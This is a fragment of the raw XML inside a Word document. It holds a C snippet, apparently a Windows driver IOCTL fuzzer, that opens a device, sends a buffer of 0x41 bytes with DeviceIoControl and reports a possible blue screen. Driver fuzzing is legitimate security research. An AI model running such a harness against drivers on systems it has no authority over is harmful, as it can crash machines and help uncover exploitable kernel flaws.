            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CreateFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lpDeviceName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GENERIC_READ | GENERIC_WRITE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pen for reading/writing| GENERIC_WRITE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>0,//FILE_SHARE_WRITE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Allow Share</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>NULL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Default security</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>OPEN_EXISTING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Opens a file or device, only if it exists.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>0,//FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>// Normal file</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>NULL);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t>if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceHandle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> == INVALID_HANDLE_VALUE) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"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[-] FAILED, error code: %d\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>n%s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">\n", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>GetLastError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(),</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>errorCode2String(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>GetLastError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>GetLastError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>() == 5)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD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[!] Access Driver </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deny</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>,Please</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> try Administrator...(If you are Administrator, Fuzz </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>failure,try</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> another Driver..\n)");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>exit(1);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/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brutebufInput</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 0x41, 0x10000);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>memset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>brutebufOutput</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 0x41, 0x10000);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t>//for (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> i = 0; i &lt; 65535; i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t>//</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>printf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("0x%x\n", i);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"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input anything to send the IO Code: 0x%x", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>IoctlCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getchar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">status = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DeviceIoControl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceHandle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</w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>IoctlCode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&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>brutebufInput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count,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>brutebufOutput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count,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nbBytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>NULL);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t>//}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD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BSOD, Pity!!!\n\n");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00641695" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00641695" w:rsidRPr="006B436C" w:rsidRDefault="00641695" w:rsidP="006B436C"/>
    <w:sectPr w:rsidR="00641695" w:rsidRPr="006B43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CF9" w:rsidRDefault="00100CF9" w:rsidP="00CB5F28">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00100CF9" w:rsidRDefault="00100CF9" w:rsidP="00CB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CF9" w:rsidRDefault="00100CF9" w:rsidP="00CB5F28">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00100CF9" w:rsidRDefault="00100CF9" w:rsidP="00CB5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AD"/>
    <w:rsid w:val="00002BCE"/>
    <w:rsid w:val="00020136"/>
    <w:rsid w:val="000217C0"/>
    <w:rsid w:val="00050716"/>
    <w:rsid w:val="00057A98"/>
    <w:rsid w:val="00087E67"/>
    <w:rsid w:val="000A2366"/>
    <w:rsid w:val="000A7ACF"/>
    <w:rsid w:val="000B3113"/>
    <w:rsid w:val="000D665B"/>
    <w:rsid w:val="000F1ABF"/>
    <w:rsid w:val="00100CF9"/>
    <w:rsid w:val="00100D0B"/>
    <w:rsid w:val="00102BF4"/>
    <w:rsid w:val="001079B3"/>
    <w:rsid w:val="00120BEA"/>
    <w:rsid w:val="0013594B"/>
    <w:rsid w:val="001370C0"/>
    <w:rsid w:val="00153FE3"/>
    <w:rsid w:val="001639CF"/>
    <w:rsid w:val="00186420"/>
    <w:rsid w:val="0020189B"/>
    <w:rsid w:val="00203F0D"/>
    <w:rsid w:val="00225ECD"/>
    <w:rsid w:val="00227278"/>
    <w:rsid w:val="00257D7E"/>
    <w:rsid w:val="002A295A"/>
    <w:rsid w:val="002A3A19"/>
    <w:rsid w:val="002F1B0C"/>
    <w:rsid w:val="00327107"/>
    <w:rsid w:val="003515FC"/>
    <w:rsid w:val="00354500"/>
    <w:rsid w:val="003633AD"/>
    <w:rsid w:val="003D2EE6"/>
    <w:rsid w:val="003D7299"/>
    <w:rsid w:val="003F7A7E"/>
    <w:rsid w:val="00402C05"/>
    <w:rsid w:val="0040715B"/>
    <w:rsid w:val="004178BF"/>
    <w:rsid w:val="00447356"/>
    <w:rsid w:val="00462417"/>
    <w:rsid w:val="00462E9F"/>
    <w:rsid w:val="004A37D8"/>
    <w:rsid w:val="004E535E"/>
    <w:rsid w:val="00516D3D"/>
    <w:rsid w:val="00550308"/>
    <w:rsid w:val="005736A9"/>
    <w:rsid w:val="00573D3C"/>
    <w:rsid w:val="005A15ED"/>
    <w:rsid w:val="005A4734"/>
    <w:rsid w:val="005B6E48"/>
    <w:rsid w:val="005C3E7D"/>
    <w:rsid w:val="005D640A"/>
    <w:rsid w:val="005D724C"/>
    <w:rsid w:val="005E1BE9"/>
    <w:rsid w:val="006076EE"/>
    <w:rsid w:val="00624034"/>
    <w:rsid w:val="00641695"/>
    <w:rsid w:val="0065357F"/>
    <w:rsid w:val="0066796F"/>
    <w:rsid w:val="00691584"/>
    <w:rsid w:val="00694172"/>
    <w:rsid w:val="006A5728"/>
    <w:rsid w:val="006B436C"/>
    <w:rsid w:val="006F7BE9"/>
    <w:rsid w:val="007074F8"/>
    <w:rsid w:val="007434CE"/>
    <w:rsid w:val="00756482"/>
    <w:rsid w:val="007565B8"/>
    <w:rsid w:val="00767183"/>
    <w:rsid w:val="00772522"/>
    <w:rsid w:val="007733B7"/>
    <w:rsid w:val="007A2195"/>
    <w:rsid w:val="007A2E0E"/>
    <w:rsid w:val="007B1EDC"/>
    <w:rsid w:val="007C0D3E"/>
    <w:rsid w:val="007C795B"/>
    <w:rsid w:val="007D7CF4"/>
    <w:rsid w:val="007F3743"/>
    <w:rsid w:val="00806CF6"/>
    <w:rsid w:val="008243BD"/>
    <w:rsid w:val="0086257D"/>
    <w:rsid w:val="00863E75"/>
    <w:rsid w:val="00864233"/>
    <w:rsid w:val="008770AE"/>
    <w:rsid w:val="008A0867"/>
    <w:rsid w:val="008C37C1"/>
    <w:rsid w:val="008D1E1E"/>
    <w:rsid w:val="008D7846"/>
    <w:rsid w:val="008F5B34"/>
    <w:rsid w:val="0092476C"/>
    <w:rsid w:val="00990DDB"/>
    <w:rsid w:val="009C6DDA"/>
    <w:rsid w:val="00A36159"/>
    <w:rsid w:val="00A46FBF"/>
    <w:rsid w:val="00A62FB1"/>
    <w:rsid w:val="00A76A3A"/>
    <w:rsid w:val="00A77E01"/>
    <w:rsid w:val="00AD1836"/>
    <w:rsid w:val="00AD3F7E"/>
    <w:rsid w:val="00B10643"/>
    <w:rsid w:val="00B4129C"/>
    <w:rsid w:val="00B476A3"/>
    <w:rsid w:val="00B6489E"/>
    <w:rsid w:val="00B74BAD"/>
    <w:rsid w:val="00BA7E30"/>
    <w:rsid w:val="00BB3376"/>
    <w:rsid w:val="00BB657E"/>
    <w:rsid w:val="00BD274D"/>
    <w:rsid w:val="00BF07CB"/>
    <w:rsid w:val="00BF373B"/>
    <w:rsid w:val="00BF4BAD"/>
    <w:rsid w:val="00BF6F8B"/>
    <w:rsid w:val="00C1750A"/>
    <w:rsid w:val="00C2628B"/>
    <w:rsid w:val="00CB4C14"/>
    <w:rsid w:val="00CB5F28"/>
    <w:rsid w:val="00CD1A4E"/>
    <w:rsid w:val="00CE2D69"/>
    <w:rsid w:val="00D11136"/>
    <w:rsid w:val="00D17C19"/>
    <w:rsid w:val="00DA5FFB"/>
    <w:rsid w:val="00DA6E55"/>
    <w:rsid w:val="00DE1514"/>
    <w:rsid w:val="00E03618"/>
    <w:rsid w:val="00E05784"/>
    <w:rsid w:val="00E2678A"/>
    <w:rsid w:val="00EF288A"/>
    <w:rsid w:val="00F12A3E"/>
    <w:rsid w:val="00F4076E"/>
    <w:rsid w:val="00F7588E"/>
    <w:rsid w:val="00F95443"/>
    <w:rsid w:val="00FA1A3A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4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43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4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B436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F37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373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373B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="0064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B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B5F2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B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B5F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3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4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436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B4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B436C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F37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373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373B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="006416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B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B5F2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B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B5F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6FEE-FC1B-468E-9C1A-07CF0EA9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353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infinite</cp:lastModifiedBy>
  <cp:revision>156</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-03T02:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-10T03:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>